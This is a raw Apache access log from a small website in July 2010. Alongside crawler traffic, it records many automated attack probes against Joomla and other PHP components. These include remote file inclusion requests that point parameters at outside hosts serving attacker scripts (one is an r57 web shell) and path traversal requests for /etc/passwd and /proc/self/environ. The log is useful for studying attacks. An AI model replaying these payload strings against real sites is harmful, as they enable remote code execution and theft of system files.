76.13.123.195 - - [27/Jul/2010:15:22:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [27/Jul/2010:15:23:54 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
203.73.225.154 - - [27/Jul/2010:15:28:23 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
89.108.64.192 - - [27/Jul/2010:15:36:06 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [27/Jul/2010:15:44:24 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [27/Jul/2010:15:44:25 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
89.108.64.192 - - [27/Jul/2010:15:44:25 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
112.104.109.214 - - [27/Jul/2010:15:47:59 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.114.106 - - [27/Jul/2010:16:00:35 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
220.136.79.140 - - [27/Jul/2010:16:37:09 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
66.163.171.206 - - [27/Jul/2010:16:46:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [27/Jul/2010:17:07:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
212.174.28.46 - - [27/Jul/2010:17:09:14 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:17:13:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.141.91.138 - - [27/Jul/2010:17:34:35 -0700] "GET /logs//index.php?option=com_admin&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
125.141.91.138 - - [27/Jul/2010:17:34:36 -0700] "GET /index.php?option=com_admin&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
125.141.91.138 - - [27/Jul/2010:17:34:38 -0700] "GET /logs//index.php?option=com_admin&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
125.141.91.138 - - [27/Jul/2010:17:34:39 -0700] "GET /index.php?option=com_admin&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
66.163.171.205 - - [27/Jul/2010:18:11:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [27/Jul/2010:18:28:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.196.169.109 - - [27/Jul/2010:18:45:11 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.moscowcable.ru/.php/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
91.196.169.109 - - [27/Jul/2010:18:45:12 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.moscowcable.ru/.php/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
91.196.169.109 - - [27/Jul/2010:18:46:49 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.moscowcable.ru/.php/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.195 - - [27/Jul/2010:18:54:37 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.196.169.109 - - [27/Jul/2010:19:12:30 -0700] "GET /logs/access.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.moscowcable.ru/.php/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
91.196.169.109 - - [27/Jul/2010:19:12:30 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.moscowcable.ru/.php/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
91.196.169.109 - - [27/Jul/2010:19:12:30 -0700] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.moscowcable.ru/.php/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.195.115.240 - - [27/Jul/2010:19:26:20 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
67.195.115.240 - - [27/Jul/2010:19:26:21 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
207.46.199.184 - - [27/Jul/2010:19:34:21 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
66.163.171.206 - - [27/Jul/2010:19:36:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [27/Jul/2010:19:49:04 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.196.169.109 - - [27/Jul/2010:20:04:29 -0700] "GET /logs/access_100614.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.moscowcable.ru/.php/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
83.16.100.218 - - [27/Jul/2010:20:19:29 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.16.100.218 - - [27/Jul/2010:20:19:29 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.16.100.218 - - [27/Jul/2010:20:19:29 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
114.38.87.197 - - [27/Jul/2010:20:30:46 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
114.41.22.107 - - [27/Jul/2010:20:37:41 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
111.252.120.68 - - [27/Jul/2010:20:45:31 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.123.195 - - [27/Jul/2010:20:47:46 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
207.46.204.181 - - [27/Jul/2010:20:58:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
66.163.171.206 - - [27/Jul/2010:21:03:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
194.39.140.30 - - [27/Jul/2010:21:03:43 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kadafi.de/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.30 - - [27/Jul/2010:21:03:43 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kadafi.de/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
194.39.140.30 - - [27/Jul/2010:21:03:43 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.kadafi.de/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [27/Jul/2010:21:05:23 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
207.46.204.181 - - [27/Jul/2010:21:06:59 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
216.18.213.162 - - [27/Jul/2010:21:15:13 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.114.107 - - [27/Jul/2010:21:32:45 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [27/Jul/2010:21:38:41 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [27/Jul/2010:21:51:23 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [27/Jul/2010:21:59:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [27/Jul/2010:22:15:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
203.73.225.154 - - [27/Jul/2010:22:21:13 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
93.158.149.32 - - [27/Jul/2010:22:22:50 -0700] "GET /logs/access.log HTTP/1.1" 200 409438 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:25:28 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:25:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
76.13.114.106 - - [27/Jul/2010:22:26:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:29:53 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:32:23 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:32:24 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:35:11 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:44:49 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:44:49 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:44:50 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.195 - - [27/Jul/2010:22:45:20 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:51:33 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:51:34 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
122.155.3.162 - - [27/Jul/2010:22:51:34 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.205 - - [27/Jul/2010:22:52:27 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [27/Jul/2010:22:52:56 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
80.35.152.243 - - [27/Jul/2010:23:16:20 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)" "www.redneckmba.com"
80.35.152.243 - - [27/Jul/2010:23:16:20 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:23:21:25 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [27/Jul/2010:23:30:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.155.3.162 - - [27/Jul/2010:23:32:17 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
88.250.57.232 - - [27/Jul/2010:23:37:42 -0700] "GET /logs/access_100727.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "www.redneckmba.com"
76.13.123.195 - - [27/Jul/2010:23:42:08 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.159.44.97 - - [27/Jul/2010:23:49:55 -0700] "GET /logs/access_100621.log//main.php?sayfa=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.159.44.97 - - [27/Jul/2010:23:49:55 -0700] "GET /main.php?sayfa=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.159.44.97 - - [27/Jul/2010:23:49:55 -0700] "GET /logs//main.php?sayfa=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [27/Jul/2010:23:51:01 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.155.3.162 - - [27/Jul/2010:23:51:07 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
41.78.28.104 - - [28/Jul/2010:00:09:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
41.78.28.104 - - [28/Jul/2010:00:09:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:00:10:34 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
140.128.174.15 - - [28/Jul/2010:00:14:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.106 - - [28/Jul/2010:00:20:36 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
189.1.171.233 - - [28/Jul/2010:00:21:09 -0700] "GET /logs/myMailer.class.php?mosConfig_absolute_path=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
189.1.171.233 - - [28/Jul/2010:00:21:12 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
189.1.171.233 - - [28/Jul/2010:00:21:13 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
189.1.171.233 - - [28/Jul/2010:00:21:14 -0700] "GET /logs/myMailer.class.php?mosConfig_absolute_path=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
189.21.153.139 - - [28/Jul/2010:00:34:05 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
189.21.153.139 - - [28/Jul/2010:00:34:06 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
76.13.123.195 - - [28/Jul/2010:00:37:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [28/Jul/2010:00:50:59 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [28/Jul/2010:00:51:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
217.73.227.25 - - [28/Jul/2010:00:51:45 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
217.73.227.25 - - [28/Jul/2010:00:51:45 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
140.128.174.15 - - [28/Jul/2010:01:16:54 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
140.128.174.15 - - [28/Jul/2010:01:16:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
140.128.174.15 - - [28/Jul/2010:01:16:55 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.105 - - [28/Jul/2010:01:23:46 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [28/Jul/2010:01:34:35 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [28/Jul/2010:01:35:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
168.143.19.89 - - [28/Jul/2010:01:45:03 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "redneckmba.com"
168.143.19.89 - - [28/Jul/2010:01:45:03 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "redneckmba.com"
76.13.114.105 - - [28/Jul/2010:01:57:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:16:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:16:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:02:18:12 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:19:54 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:19:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:19:54 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:20:08 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:20:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:20:08 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
67.202.10.86 - - [28/Jul/2010:02:21:57 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.redneckmba.com"
67.202.10.86 - - [28/Jul/2010:02:21:57 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:02:23:05 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:02:23:05 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:02:23:05 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:26:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:26:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
41.78.28.104 - - [28/Jul/2010:02:30:31 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
41.78.28.104 - - [28/Jul/2010:02:30:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
41.78.28.104 - - [28/Jul/2010:02:30:38 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.114.107 - - [28/Jul/2010:02:30:53 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.123.133.162 - - [28/Jul/2010:02:32:52 -0700] "GET /logs/access_100614.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [28/Jul/2010:02:35:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
41.78.28.104 - - [28/Jul/2010:02:40:04 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
